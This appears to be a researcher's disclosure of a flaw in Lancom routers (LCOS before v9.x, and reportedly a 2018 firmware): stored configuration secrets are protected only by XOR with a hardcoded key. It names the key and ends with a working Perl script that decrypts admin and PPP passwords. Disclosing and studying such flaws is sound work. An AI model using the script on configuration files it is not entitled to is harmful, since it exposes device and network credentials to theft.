Sorry for the late re-discovery - the issue was found and reported in 2009, but had been accidentally buried on my side, and only was re-discovered again in late 2016.
Systems affected: all routers running LCOS before v9.x (confirmed by Lancom)
{Secrets} 2.1 == 2f1b18091d
The secret is decrypted by simply XORing it byte-wise with the hardcoded String "Knuddelbaerchen" (which is German for "cuddly baby baer")
BUT:
@sur5r reported that the bug still is valid on a LANCOM R883+ with Firmware 10.12.0442
(20.07.2018) and affects PPP and admin passwords
Please update to a newer model and handle existing configuration files with care as advised in the manual's Security Checklist (and the "Workaround" section below).
Thank you to Lancom for quicky responding and resolving the issue (Support-ID 1609.2312.0000.KSCH).
When forwarding it to support, vendors or consultants please remove the {Secrets} section (especially the key 2.1).
#!/usr/bin/perl -w #---------------------------------------------------------------------- # # ./lancom-pw-decrypt.pl ....pw.... $key="Knuddelbaerchen"; $text = pack('H*',$ARGV[0]); $len = length($text); $xlen = int((length($text) / length($key))+1); $result = $text ^ ($key x $xlen); $result = substr($result,0,$len); print "$result\n"; #---------------------------------------------------------------------- # 2009/2016# https://www.wyae.de/volker.tanger/vuln/lancom_password_knuddelbaerchen/